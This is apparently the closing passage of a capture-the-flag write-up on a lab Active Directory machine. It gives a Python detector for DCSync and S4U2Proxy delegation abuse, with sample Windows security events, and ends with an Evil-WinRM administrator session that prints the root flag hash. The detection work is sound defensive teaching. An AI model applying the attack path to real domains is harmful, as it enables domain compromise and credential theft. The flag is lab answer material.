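    {"EventID": 4662, "SubjectUserName": "ppaul", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # the case from this writeup: the caller holds a ticket as DC01$, so 4662 alone looks benign
    {"EventID": 4662, "SubjectUserName": "DC01$", "AccessMask": "0x100",
     "Properties": "{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # ... but the service ticket behind it was obtained via S4U2Proxy from a non-DC host
    {"EventID": 4769, "TargetUserName": "DC01$@REBOUND.HTB", "ServiceName": "http/dc01.rebound.htb",
     "IpAddress": "::ffff:10.10.14.5", "TransitedServices": "delegator$@REBOUND.HTB"},
    # an ordinary service-ticket request by the DC itself
    {"EventID": 4769, "TargetUserName": "DC01$@REBOUND.HTB", "ServiceName": "ldap/dc01.rebound.htb",
     "IpAddress": "::ffff:10.129.229.114", "TransitedServices": "-"},
]


def replication_rights(properties):
    """Names of the replication control-access rights present in a 4662 Properties field."""
    return [REPLICATION_RIGHTS[g.lower()] for g in GUID_RE.findall(properties)
            if g.lower() in REPLICATION_RIGHTS]


def strip_v4mapped(ip):
    """Security events log IPv4 clients as ::ffff:a.b.c.d; normalise to a.b.c.d."""
    return ip[7:] if ip.lower().startswith("::ffff:") else ip


def detect(events):
    """Return (rule, account, detail) tuples for events that match either detection."""
    alerts = []
    for e in events:
        if e["EventID"] == 4662:
            rights = replication_rights(e["Properties"])
            if rights and e["SubjectUserName"] not in DC_ACCOUNTS:
                alerts.append(("dcsync-by-non-dc", e["SubjectUserName"], ",".join(rights)))
        elif e["EventID"] == 4769:
            account = e["TargetUserName"].split("@", 1)[0]
            if account in DC_ACCOUNTS:
                src = strip_v4mapped(e["IpAddress"])
                transited = e.get("TransitedServices", "-")
                # A DC account should request its tickets from a DC, and never via S4U2Proxy.
                if src not in DC_ADDRESSES or transited not in ("", "-"):
                    alerts.append(("dc-account-ticket-via-delegation", account,
                                   f"{e['ServiceName']} from {src} via {transited}"))
    return alerts


if __name__ == "__main__":
    for rule, account, detail in detect(SAMPLE_EVENTS):
        print(f"[{rule}] {account}: {detail}")
```

The first rule fires for ppaul; the second is the one that catches this writeup's path, because the DC01$ 4662 event is indistinguishable from normal replication. Both depend on auditing that is off by default: 4662 needs "Audit Directory Service Access" enabled plus a SACL on the domain head for the replication rights, and 4769 needs "Audit Kerberos Service Ticket Operations".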
Root.txt
*Evil-WinRM* PS C:\Users\Administrator\Documents> ls $ENV:USERPROFILE -fil *.txt -rec | %{$_.FullName;cat $_.FullName}
C:\Users\Administrator\Desktop\root.txt
1dd53e48094c810a28d9ee966c0bae7a